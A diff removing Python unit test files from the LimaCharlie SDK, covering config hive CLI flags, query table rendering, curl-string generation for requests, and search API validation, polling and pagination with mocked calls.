-        """Test that --hive-external-adapter flag passes external_adapter to fetch."""
-        from limacharlie.Configs import main
-
-        with mock.patch('limacharlie.Configs.Configs') as MockConfigs:
-            mock_instance = MockConfigs.return_value
-            mock_instance.fetch = mock.Mock()
-
-            # Call main with --hive-external-adapter flag
-            main(['fetch', '-o', '00000000-0000-0000-0000-000000000000',
-                  '--hive-external-adapter', '-c', '/tmp/test.yaml'])
-
-            # Verify fetch was called with external_adapter in isHives
-            mock_instance.fetch.assert_called_once()
-            call_kwargs = mock_instance.fetch.call_args[1]
-            assert 'isHives' in call_kwargs
-            assert call_kwargs['isHives'].get('external_adapter') is True
-
-    def test_external_adapter_flag_sets_hive_in_push(self):
-        """Test that --hive-external-adapter flag passes external_adapter to push."""
-        from limacharlie.Configs import main
-
-        with mock.patch('limacharlie.Configs.Configs') as MockConfigs:
-            mock_instance = MockConfigs.return_value
-            # push() is a generator, so we need to mock it as one
-            mock_instance.push = mock.Mock(return_value=iter([]))
-
-            # Call main with --hive-external-adapter flag
-            main(['push', '-o', '00000000-0000-0000-0000-000000000000',
-                  '--hive-external-adapter', '-c', '/tmp/test.yaml'])
-
-            # Verify push was called with external_adapter in isHives
-            mock_instance.push.assert_called_once()
-            call_kwargs = mock_instance.push.call_args[1]
-            assert 'isHives' in call_kwargs
-            assert call_kwargs['isHives'].get('external_adapter') is True
-
-    def test_external_adapter_not_set_when_flag_omitted(self):
-        """Test that external_adapter is not in hives when flag is not provided."""
-        from limacharlie.Configs import main
-
-        with mock.patch('limacharlie.Configs.Configs') as MockConfigs:
-            mock_instance = MockConfigs.return_value
-            mock_instance.fetch = mock.Mock()
-
-            # Call main with only --hive-cloud-sensor (not external_adapter)
-            main(['fetch', '-o', '00000000-0000-0000-0000-000000000000',
-                  '--hive-cloud-sensor', '-c', '/tmp/test.yaml'])
-
-            # Verify fetch was called without external_adapter in isHives
-            mock_instance.fetch.assert_called_once()
-            call_kwargs = mock_instance.fetch.call_args[1]
-            assert 'isHives' in call_kwargs
-            assert call_kwargs['isHives'].get('external_adapter') is not True
-
-
-class TestConfigsAllFlag:
-    """Tests for --all flag including external_adapter hive."""
-
-    def test_all_flag_includes_external_adapter_in_fetch(self):
-        """Test that --all flag includes external_adapter in hives for fetch."""
-        from limacharlie.Configs import main
-
-        with mock.patch('limacharlie.Configs.Configs') as MockConfigs:
-            mock_instance = MockConfigs.return_value
-            mock_instance.fetch = mock.Mock()
-
-            # Call main with --all flag
-            main(['fetch', '-o', '00000000-0000-0000-0000-000000000000',
-                  '--all', '-c', '/tmp/test.yaml'])
-
-            # Verify fetch was called with external_adapter in isHives
-            mock_instance.fetch.assert_called_once()
-            call_kwargs = mock_instance.fetch.call_args[1]
-            assert 'isHives' in call_kwargs
-            assert call_kwargs['isHives'].get('external_adapter') is True
-
-    def test_all_flag_includes_external_adapter_in_push(self):
-        """Test that --all flag includes external_adapter in hives for push."""
-        from limacharlie.Configs import main
-
-        with mock.patch('limacharlie.Configs.Configs') as MockConfigs:
-            mock_instance = MockConfigs.return_value
-            mock_instance.push = mock.Mock(return_value=iter([]))
-
-            # Call main with --all flag
-            main(['push', '-o', '00000000-0000-0000-0000-000000000000',
-                  '--all', '-c', '/tmp/test.yaml'])
-
-            # Verify push was called with external_adapter in isHives
-            mock_instance.push.assert_called_once()
-            call_kwargs = mock_instance.push.call_args[1]
-            assert 'isHives' in call_kwargs
-            assert call_kwargs['isHives'].get('external_adapter') is True
-
-    def test_all_flag_includes_all_expected_hives(self):
-        """Test that --all flag includes all 14 expected hives."""
-        from limacharlie.Configs import main
-
-        expected_hives = {
-            'dr-general',
-            'dr-managed',
-            'dr-service',
-            'fp',
-            'cloud_sensor',
-            'extension_config',
-            'yara',
-            'lookup',
-            'secret',
-            'query',
-            'playbook',
-            'ai_agent',
-            'external_adapter',
-        }
-
-        with mock.patch('limacharlie.Configs.Configs') as MockConfigs:
-            mock_instance = MockConfigs.return_value
-            mock_instance.fetch = mock.Mock()
-
-            main(['fetch', '-o', '00000000-0000-0000-0000-000000000000',
-                  '--all', '-c', '/tmp/test.yaml'])
-
-            call_kwargs = mock_instance.fetch.call_args[1]
-            actual_hives = set(call_kwargs['isHives'].keys())
-
-            assert actual_hives == expected_hives, \
-                f"Missing hives: {expected_hives - actual_hives}, " \
-                f"Extra hives: {actual_hives - expected_hives}"
-
-
-class TestConfigsMultipleHiveFlags:
-    """Tests for combining multiple hive flags."""
-
-    def test_multiple_hive_flags_combined(self):
-        """Test that multiple hive flags are combined correctly."""
-        from limacharlie.Configs import main
-
-        with mock.patch('limacharlie.Configs.Configs') as MockConfigs:
-            mock_instance = MockConfigs.return_value
-            mock_instance.fetch = mock.Mock()
-
-            # Call main with multiple hive flags
-            main(['fetch', '-o', '00000000-0000-0000-0000-000000000000',
-                  '--hive-external-adapter', '--hive-cloud-sensor', '--hive-lookup',
-                  '-c', '/tmp/test.yaml'])
-
-            call_kwargs = mock_instance.fetch.call_args[1]
-            hives = call_kwargs['isHives']
-
-            # All three should be present
-            assert hives.get('external_adapter') is True
-            assert hives.get('cloud_sensor') is True
-            assert hives.get('lookup') is True
-
-            # Others should not be present
-            assert hives.get('playbook') is not True
-            assert hives.get('secret') is not True
diff --git a/tests/unit/test_query.py b/tests/unit/test_query.py
deleted file mode 100644
index 180b074e..00000000
--- a/tests/unit/test_query.py
+++ /dev/null
@@ -1,61 +0,0 @@
-import pytest
-
-from limacharlie.Query import LCQuery
-
-def noop(self):
-    pass
-
-
-def test_lcquery_rendereTable_event_ordering():
-    elem = [
-        {
-            "ts": 123456789,
-            "routing": {
-                "foo": "bar"
-            },
-            "event": {
-                "type": "foo",
-                "data": {
-                    "foo": "bar"
-                }
-            }
-        }
-    ]
-
-    LCQuery._getAllEvents = noop
-    LCQuery._populateSchema = noop
-    LCQuery._setPrompt = noop
-    lcq = LCQuery(replay=None, format="table", outFile=None)
-    result = lcq._renderTable(elem)
-    assert "ts" in result
-    assert "routing" in result
-    assert "event" in result
-    assert "123456789" in result
-    assert "foo" in result
-    assert "bar" in result
-
-
-def test_lcquery_rendereTable_non_event():
-    elem = [
-        {
-            "ts": 123456789,
-            "field1": {
-                "foo": "bar"
-            },
-            "field2": {
-                "type": "foo",
-                "data": {
-                    "foo": "bar"
-                }
-            }
-        }
-    ]
-
-    LCQuery._getAllEvents = noop
-    LCQuery._populateSchema = noop
-    LCQuery._setPrompt = noop
-    lcq = LCQuery(replay=None, format="table", outFile=None)
-    result = lcq._renderTable(elem)
-    assert "123456789" in result
-    assert "field1" in result
-    assert "field2" in result
diff --git a/tests/unit/test_requests_utils.py b/tests/unit/test_requests_utils.py
deleted file mode 100644
index 18fbec60..00000000
--- a/tests/unit/test_requests_utils.py
+++ /dev/null
@@ -1,122 +0,0 @@
-import shlex
-
-import pytest
-
-from limacharlie.request_utils import getCurlCommandString
-
-
-class DummyRequestNoMethod:
-    """
-    Dummy request without get_method or header_items.
-    Has a full_url attribute and optional data.
-    """
-    def __init__(self, full_url, data=None):
-        self.full_url = full_url
-        self.data = data
-
-
-class DummyRequestWithMethods:
-    """
-    Dummy request that provides get_method, header_items, and get_full_url.
-    Headers can be passed as a dict or list of tuples.
-    """
-    def __init__(self, method, headers, data, url):
-        self._method = method
-        self._headers = headers
-        self.data = data
-        self.full_url = url
-
-    def get_method(self):
-        return self._method
-
-    def header_items(self):
-        if isinstance(self._headers, dict):
-            return list(self._headers.items())
-        return self._headers
-
-    def get_full_url(self):
-        return self.full_url
-
-
-class DummyRequestNoFullUrl:
-    """
-    Dummy request that does not have either get_full_url or full_url.
-    This should raise an AttributeError when used.
-    """
-    def __init__(self, data=None):
-        self.data = data
-
-
-def test_default_get_method():
-    """Test a basic GET request when get_method and header_items are missing."""
-    dummy = DummyRequestNoMethod("http://example.com")
-    result = getCurlCommandString(dummy)
-    expected = "curl -X " + shlex.quote("GET") + " " + shlex.quote("http://example.com")
-    assert result == expected
-
-
-def test_post_with_headers():
-    """Test a POST request with headers and no data."""
-    headers = {"Content-Type": "application/json"}
-    dummy = DummyRequestWithMethods("POST", headers, None, "http://example.com/api")
-    result = getCurlCommandString(dummy)
-    expected = (
-        "curl -X " + shlex.quote("POST") +
-        " -H " + shlex.quote("Content-Type: application/json") +
-        " " + shlex.quote("http://example.com/api")
-    )
-    assert result == expected
-
-
-def test_with_utf8_data():
-    """Test a request with a valid UTF-8 data payload."""
-    data = b'{"key": "value"}'
-    dummy = DummyRequestWithMethods("PUT", {"Accept": "application/json"}, data, "http://example.com/update")
-    result = getCurlCommandString(dummy)
-    expected = (
-        "curl -X " + shlex.quote("PUT") +
-        " -H " + shlex.quote("Accept: application/json") +
-        " -d " + shlex.quote('{"key": "value"}') +
-        " " + shlex.quote("http://example.com/update")
-    )
-    assert result == expected
-
-
-def test_with_non_utf8_data():
-    """Test a request with data that cannot be decoded as UTF-8."""
-    class NonUTF8Data:
-        def decode(self, encoding):
-            raise UnicodeDecodeError("utf-8", b"", 0, 1, "error")
-        def __str__(self):
-            return "NonUTF8Data"
-    data = NonUTF8Data()
-    dummy = DummyRequestWithMethods("PATCH", {"Authorization": "Bearer token"}, data, "http://example.com/patch")
-    result = getCurlCommandString(dummy)
-    expected = (
-        "curl -X " + shlex.quote("PATCH") +
-        " -H " + shlex.quote("Authorization: Bearer token") +
-        " -d " + shlex.quote("NonUTF8Data") +
-        " " + shlex.quote("http://example.com/patch")
-    )
-    assert result == expected
-
-
-def test_multiple_headers():
-    """Test a request with multiple headers provided as a list of tuples."""
-    headers = [("Accept", "application/json"), ("User-Agent", "pytest")]
-    dummy = DummyRequestWithMethods("GET", headers, None, "http://example.com/multi")
-    result = getCurlCommandString( dummy)
-    expected = (
-        "curl -X " + shlex.quote("GET") +
-        " -H " + shlex.quote("Accept: application/json") +
-        " -H " + shlex.quote("User-Agent: pytest") +
-        " " + shlex.quote("http://example.com/multi")
-    )
-    assert result == expected
-
-
-def test_missing_url():
-    """Test that a request missing both get_full_url and full_url raises an error."""
-    dummy = DummyRequestNoFullUrl()
-    with pytest.raises(AttributeError):
-        getCurlCommandString(dummy)
\ No newline at end of file
diff --git a/tests/unit/test_search_api.py b/tests/unit/test_search_api.py
deleted file mode 100644
index 363743ce..00000000
--- a/tests/unit/test_search_api.py
+++ /dev/null
@@ -1,579 +0,0 @@
-"""
-Unit tests for the Search API functionality.
-
-Tests cover:
-- SDK methods (validateSearch, initiateSearch, pollSearchResults, executeSearch)
-- CLI commands (validate, execute)
-- Edge cases and error scenarios
-- Different result types (events, facets, timeline)
-- Pagination scenarios
-- Error handling
-- Timeout conditions
-- Network failures
-"""
-
-import pytest
-from unittest.mock import Mock, patch, MagicMock, call
-import json
-import time
-import sys
-from io import StringIO
-
-
-class TestSearchAPISDK:
-    """Test the Search API SDK methods in the Manager class."""
-
-    def test_validate_search_basic(self):
-        """Test basic search validation."""
-        # Import Manager
-        from limacharlie import Manager
-
-        # Create a mock manager
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock the _apiCall method
-        expected_response = {
-            'query': 'event_type = NEW_PROCESS',
-            'startTime': 1234567890,
-            'endTime': 1234567900,
-            'estimatedPrice': {
-                'value': 0.0050,
-                'currency': 'USD'
-            }
-        }
-        manager._apiCall = Mock(return_value=expected_response)
-
-        # Call validateSearch
-        result = manager.validateSearch(
-            'event_type = NEW_PROCESS',
-            1234567890,
-            1234567900
-        )
-
-        # Verify the API call was made correctly
-        manager._apiCall.assert_called_once()
-        call_args = manager._apiCall.call_args
-
-        # Check that it was a POST to search/validate
-        assert call_args[0][0] == 'search/validate'
-        assert call_args[0][1] == 'POST'
-
-        # Check the request body
-        raw_body = call_args[1]['rawBody']
-        request_data = json.loads(raw_body.decode())
-        assert request_data['oid'] == 'test-oid-123'
-        assert request_data['query'] == 'event_type = NEW_PROCESS'
-        assert request_data['startTime'] == '1234567890'
-        assert request_data['endTime'] == '1234567900'
-
-        # Verify altRoot was passed
-        assert call_args[1]['altRoot'] == 'https://search.limacharlie.io/v1'
-
-        # Verify the response
-        assert result == expected_response
-
-    def test_validate_search_with_stream(self):
-        """Test search validation with stream parameter."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        expected_response = {
-            'query': 'event_type = NEW_PROCESS',
-            'startTime': 1234567890,
-            'endTime': 1234567900,
-            'estimatedPrice': {
-                'value': 0.0050,
-                'currency': 'USD'
-            }
-        }
-        manager._apiCall = Mock(return_value=expected_response)
-
-        # Call validateSearch with stream
-        result = manager.validateSearch(
-            'event_type = NEW_PROCESS',
-            1234567890,
-            1234567900,
-            stream='event'
-        )
-
-        # Verify the stream was included in request
-        call_args = manager._apiCall.call_args
-        raw_body = call_args[1]['rawBody']
-        request_data = json.loads(raw_body.decode())
-        assert request_data['stream'] == 'event'
-
-    def test_initiate_search_basic(self):
-        """Test initiating a search."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        expected_response = {
-            'queryId': 'query-id-abc123'
-        }
-        manager._apiCall = Mock(return_value=expected_response)
-
-        # Call initiateSearch
-        result = manager.initiateSearch(
-            'event_type = NEW_PROCESS',
-            1234567890,
-            1234567900
-        )
-
-        # Verify the API call
-        manager._apiCall.assert_called_once()
-        call_args = manager._apiCall.call_args
-
-        assert call_args[0][0] == 'search'
-        assert call_args[0][1] == 'POST'
-
-        raw_body = call_args[1]['rawBody']
-        request_data = json.loads(raw_body.decode())
-        assert request_data['oid'] == 'test-oid-123'
-        assert request_data['query'] == 'event_type = NEW_PROCESS'
-        assert request_data['paginated'] == True
-
-        assert result == expected_response
-
-    def test_initiate_search_without_pagination(self):
-        """Test initiating a search without pagination."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        expected_response = {'queryId': 'query-id-abc123'}
-        manager._apiCall = Mock(return_value=expected_response)
-
-        # Call initiateSearch with paginated=False
-        result = manager.initiateSearch(
-            'event_type = NEW_PROCESS',
-            1234567890,
-            1234567900,
-            paginated=False
-        )
-
-        # Verify pagination flag
-        call_args = manager._apiCall.call_args
-        raw_body = call_args[1]['rawBody']
-        request_data = json.loads(raw_body.decode())
-        assert request_data['paginated'] == False
-
-    def test_poll_search_results_completed(self):
-        """Test polling for completed search results."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock a completed response
-        expected_response = {
-            'completed': True,
-            'nextPollInMs': 0,
-            'results': [
-                {'type': 'events', 'rows': [{'event_id': '123'}]}
-            ],
-            'nextToken': 'token-abc'
-        }
-        manager._apiCall = Mock(return_value=expected_response)
-
-        # Call pollSearchResults
-        result = manager.pollSearchResults('query-id-123')
-
-        # Verify the API call
-        manager._apiCall.assert_called_once()
-        call_args = manager._apiCall.call_args
-
-        assert call_args[0][0] == 'search/query-id-123'
-        assert call_args[0][1] == 'GET'
-
-        assert result == expected_response
-
-    def test_poll_search_results_with_token(self):
-        """Test polling with pagination token."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        expected_response = {
-            'completed': True,
-            'results': []
-        }
-        manager._apiCall = Mock(return_value=expected_response)
-
-        # Call pollSearchResults with token
-        result = manager.pollSearchResults('query-id-123', token='page-token-xyz')
-
-        # Verify the token was passed
-        call_args = manager._apiCall.call_args
-        query_params = call_args[1]['queryParams']
-        assert query_params['token'] == 'page-token-xyz'
-
-    def test_poll_search_results_retries(self):
-        """Test polling retries when not completed."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock responses: first two not completed, third completed
-        responses = [
-            {'completed': False, 'nextPollInMs': 100},
-            {'completed': False, 'nextPollInMs': 100},
-            {'completed': True, 'results': []}
-        ]
-        manager._apiCall = Mock(side_effect=responses)
-
-        # Mock time.sleep to speed up test
-        with patch('time.sleep'):
-            result = manager.pollSearchResults('query-id-123', max_attempts=10, poll_interval=0.1)
-
-        # Verify it made 3 calls
-        assert manager._apiCall.call_count == 3
-        assert result['completed'] == True
-
-    def test_poll_search_results_max_attempts_exceeded(self):
-        """Test polling raises exception when max attempts exceeded."""
-        from limacharlie import Manager
-        from limacharlie.utils import LcApiException
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Always return not completed
-        manager._apiCall = Mock(return_value={'completed': False, 'nextPollInMs': 100})
-
-        # Expect exception after max attempts
-        with patch('time.sleep'):
-            with pytest.raises(LcApiException) as exc_info:
-                manager.pollSearchResults('query-id-123', max_attempts=3, poll_interval=0.1)
-
-        assert 'Max polling attempts exceeded' in str(exc_info.value)
-
-    def test_poll_search_results_with_error(self):
-        """Test polling returns early when error is present."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock response with error
-        error_response = {
-            'completed': False,
-            'error': 'Query failed: invalid syntax'
-        }
-        manager._apiCall = Mock(return_value=error_response)
-
-        # Should return immediately with error
-        result = manager.pollSearchResults('query-id-123')
-
-        assert result['error'] == 'Query failed: invalid syntax'
-        # Should only call once (not retry on error)
-        assert manager._apiCall.call_count == 1
-
-    def test_execute_search_single_page(self):
-        """Test executeSearch with single page of results."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock initiateSearch
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Mock pollSearchResults - single page, nextToken in LAST result object
-        manager.pollSearchResults = Mock(return_value={
-            'completed': True,
-            'results': [
-                {'type': 'events', 'event_id': '1', 'nextToken': None},
-                {'type': 'events', 'event_id': '2', 'nextToken': None},
-                {'type': 'events', 'event_id': '3', 'nextToken': None}  # Last result, no token
-            ]
-        })
-
-        # Execute search
-        results = list(manager.executeSearch('test query', 1000, 2000))
-
-        # Verify results (should have metadata fields added)
-        assert len(results) == 3
-        assert results[0]['event_id'] == '1'
-        assert results[1]['event_id'] == '2'
-        assert results[2]['event_id'] == '3'
-
-        # Verify metadata fields are added
-        assert results[0]['_page_number'] == 1
-        assert results[0]['_first_of_type_in_page'] == True
-        assert results[1]['_first_of_type_in_page'] == False  # Not first
-        assert '_billing_stats' in results[0]
-
-        # Verify initiateSearch was called
-        manager.initiateSearch.assert_called_once_with(
-            'test query',
-            1000,
-            2000,
-            paginated=True,
-            stream=None
-        )
-
-        # Verify pollSearchResults was called once with no token
-        manager.pollSearchResults.assert_called_once()
-
-    def test_execute_search_multiple_pages(self):
-        """Test executeSearch with multiple pages of results."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock initiateSearch
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Mock pollSearchResults - three pages
-        # Note: nextToken is in the LAST result object of each page
-        poll_responses = [
-            {
-                'completed': True,
-                'results': [
-                    {'type': 'events', 'event_id': '1', 'nextToken': None},
-                    {'type': 'events', 'event_id': '2', 'nextToken': 'token-page2'}  # Token in LAST result
-                ]
-            },
-            {
-                'completed': True,
-                'results': [
-                    {'type': 'events', 'event_id': '3', 'nextToken': None},
-                    {'type': 'events', 'event_id': '4', 'nextToken': 'token-page3'}  # Token in LAST result
-                ]
-            },
-            {
-                'completed': True,
-                'results': [
-                    {'type': 'events', 'event_id': '5', 'nextToken': None}  # No more pages
-                ]
-            }
-        ]
-        manager.pollSearchResults = Mock(side_effect=poll_responses)
-
-        # Execute search
-        results = list(manager.executeSearch('test query', 1000, 2000))
-
-        # Verify all results were collected
-        assert len(results) == 5
-        assert results[0]['event_id'] == '1'
-        assert results[4]['event_id'] == '5'
-
-        # Verify page numbers are set correctly
-        assert results[0]['_page_number'] == 1
-        assert results[1]['_page_number'] == 1
-        assert results[2]['_page_number'] == 2
-        assert results[3]['_page_number'] == 2
-        assert results[4]['_page_number'] == 3
-
-        # Verify pollSearchResults was called 3 times with correct tokens
-        assert manager.pollSearchResults.call_count == 3
-        call_args_list = manager.pollSearchResults.call_args_list
-        assert call_args_list[0][1]['token'] is None  # First page
-        assert call_args_list[1][1]['token'] == 'token-page2'  # Second page
-        assert call_args_list[2][1]['token'] == 'token-page3'  # Third page
-
-    def test_execute_search_with_error(self):
-        """Test executeSearch raises exception on error."""
-        from limacharlie import Manager
-        from limacharlie.utils import LcApiException
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock initiateSearch
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Mock pollSearchResults with error
-        manager.pollSearchResults = Mock(return_value={
-            'completed': True,
-            'error': 'Query execution failed',
-            'results': []
-        })
-
-        # Execute search should raise exception
-        with pytest.raises(LcApiException) as exc_info:
-            list(manager.executeSearch('test query', 1000, 2000))
-
-        assert 'Query execution failed' in str(exc_info.value)
-
-    def test_execute_search_missing_query_id(self):
-        """Test executeSearch raises exception when queryId is missing."""
-        from limacharlie import Manager
-        from limacharlie.utils import LcApiException
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock initiateSearch with missing queryId
-        manager.initiateSearch = Mock(return_value={})
-
-        # Execute search should raise exception
-        with pytest.raises(LcApiException) as exc_info:
-            list(manager.executeSearch('test query', 1000, 2000))
-
-        assert 'missing queryId' in str(exc_info.value)
-
-
-class TestSearchAPICLI:
-    """Test the Search API CLI commands."""
-
-    def test_cli_validate_basic(self, capsys):
-        """Test the validate CLI command."""
-        from limacharlie.SearchAPI import main
-
-        # Mock Manager
-        with patch('limacharlie.SearchAPI.Manager') as mock_manager_class:
-            mock_manager = MagicMock()
-            mock_manager_class.return_value = mock_manager
-
-            # Mock validateSearch response
-            mock_manager.validateSearch.return_value = {
-                'query': 'event_type = NEW_PROCESS',
-                'startTime': 1234567890,
-                'endTime': 1234567900,
-                'estimatedPrice': {
-                    'value': 0.0050,
-                    'currency': 'USD'
-                }
-            }
-
-            # Run CLI
-            main(['validate', '-q', 'event_type = NEW_PROCESS', '-s', '1234567890', '-e', '1234567900'])
-
-            # Verify validateSearch was called
-            mock_manager.validateSearch.assert_called_once_with(
-                'event_type = NEW_PROCESS',
-                1234567890,
-                1234567900,
-                stream=None
-            )
-
-            # Check output
-            captured = capsys.readouterr()
-            assert 'estimatedPrice' in captured.out
-            assert 'Estimated price: 0.0050 USD' in captured.err
-
-    def test_cli_execute_basic(self, capsys):
-        """Test the execute CLI command."""
-        from limacharlie.SearchAPI import main
-
-        # Mock Manager
-        with patch('limacharlie.SearchAPI.Manager') as mock_manager_class:
-            mock_manager = MagicMock()
-            mock_manager_class.return_value = mock_manager
-
-            # Mock executeSearch to return properly structured results
-            # Results should have 'type' field and appropriate data field ('rows' for events)
-            mock_manager.executeSearch.return_value = iter([
-                {
-                    'type': 'events',
-                    'rows': [
-                        {'event_id': '1', 'event_type': 'NEW_PROCESS'},
-                        {'event_id': '2', 'event_type': 'NEW_PROCESS'}
-                    ],
-                    'nextToken': None,
-                    '_page_number': 1,
-                    '_first_of_type_in_page': True,
-                    '_billing_stats': {}
-                }
-            ])
-
-            # Run CLI
-            main(['execute', '-q', 'event_type = NEW_PROCESS', '-s', '1000', '-e', '2000'])
-
-            # Verify executeSearch was called
-            mock_manager.executeSearch.assert_called_once()
-            call_kwargs = mock_manager.executeSearch.call_args[1]
-            assert call_kwargs['stream'] is None
-            assert call_kwargs['max_poll_attempts'] == 300
-            assert call_kwargs['poll_interval'] == 2
-
-            # Check output contains results
-            captured = capsys.readouterr()
-            assert 'event_id' in captured.out
-            assert 'Event rows: 2' in captured.err
-
-    def test_cli_execute_with_output_file(self, tmp_path):
-        """Test the execute CLI command with output file."""
-        from limacharlie.SearchAPI import main
-
-        output_file = tmp_path / "results.jsonl"
-
-        # Mock Manager
-        with patch('limacharlie.SearchAPI.Manager') as mock_manager_class:
-            mock_manager = MagicMock()
-            mock_manager_class.return_value = mock_manager
-
-            # Mock executeSearch with properly structured results
-            mock_manager.executeSearch.return_value = iter([
-                {
-                    'type': 'events',
-                    'rows': [
-                        {'event_id': '1'},
-                        {'event_id': '2'}
-                    ],
-                    'nextToken': None,
-                    '_page_number': 1,
-                    '_first_of_type_in_page': True,
-                    '_billing_stats': {}
-                }
-            ])
-
-            # Run CLI with output file
-            main([
-                'execute',
-                '-q', 'test query',
-                '-s', '1000',
-                '-e', '2000',
-                '--output-file', str(output_file)
-            ])
-
-            # Verify file was created and contains results
-            assert output_file.exists()
-            content = output_file.read_text()
-            lines = content.strip().split('\n')
-            assert len(lines) == 2
-
-            # Parse and verify JSON
-            result1 = json.loads(lines[0])
-            result2 = json.loads(lines[1])
-            assert result1['event_id'] == '1'
-            assert result2['event_id'] == '2'
diff --git a/tests/unit/test_search_api_extended.py b/tests/unit/test_search_api_extended.py
deleted file mode 100644
index 6c782c24..00000000
--- a/tests/unit/test_search_api_extended.py
+++ /dev/null
@@ -1,2318 +0,0 @@
-"""
-Extended unit tests for the Search API functionality.
-
-Additional test coverage for:
-- Different result types (events, facets, timeline, aggregations)
-- Complex pagination scenarios
-- Stream-specific behavior
-- Error recovery
-- Edge cases and boundary conditions
-- Performance scenarios
-"""
-
-import pytest
-from unittest.mock import Mock, patch, MagicMock, call
-import json
-import time
-from io import StringIO
-
-
-class TestSearchAPIValidation:
-    """Test validation-specific scenarios."""
-
-    def test_validate_search_with_error_response(self):
-        """Test validation with error in response."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock validation error
-        error_response = {
-            'query': 'invalid syntax here',
-            'error': 'Syntax error: unexpected token at position 8',
-            'startTime': 1234567890,
-            'endTime': 1234567900
-        }
-        manager._apiCall = Mock(return_value=error_response)
-
-        result = manager.validateSearch('invalid syntax here', 1234567890, 1234567900)
-
-        assert result['error'] == 'Syntax error: unexpected token at position 8'
-
-    def test_validate_search_with_high_price(self):
-        """Test validation returning high estimated price."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        high_price_response = {
-            'query': 'event_type = *',
-            'startTime': 1234567890,
-            'endTime': 1734567890,  # Large range
-            'estimatedPrice': {
-                'value': 125.50,
-                'currency': 'USD'
-            }
-        }
-        manager._apiCall = Mock(return_value=high_price_response)
-
-        result = manager.validateSearch('event_type = *', 1234567890, 1734567890)
-
-        assert result['estimatedPrice']['value'] == 125.50
-
-    def test_validate_search_different_streams(self):
-        """Test validation with different stream parameters."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-        manager._apiCall = Mock(return_value={'query': 'test', 'estimatedPrice': {'value': 0.01, 'currency': 'USD'}})
-
-        # Test each stream type
-        for stream in ['event', 'detect', 'audit']:
-            manager.validateSearch('test query', 1000, 2000, stream=stream)
-
-            call_args = manager._apiCall.call_args
-            raw_body = call_args[1]['rawBody']
-            request_data = json.loads(raw_body.decode())
-
-            assert request_data['stream'] == stream
-
-    def test_validate_search_zero_price(self):
-        """Test validation with zero estimated price."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        zero_price_response = {
-            'query': 'event_type = NEW_PROCESS',
-            'startTime': 1234567890,
-            'endTime': 1234567891,  # Very small range
-            'estimatedPrice': {
-                'value': 0.0,
-                'currency': 'USD'
-            }
-        }
-        manager._apiCall = Mock(return_value=zero_price_response)
-
-        result = manager.validateSearch('event_type = NEW_PROCESS', 1234567890, 1234567891)
-
-        assert result['estimatedPrice']['value'] == 0.0
-
-
-class TestSearchAPIInitiate:
-    """Test search initiation scenarios."""
-
-    def test_initiate_search_different_streams(self):
-        """Test initiating searches with different streams."""
-        from limacharlie import Manager
-
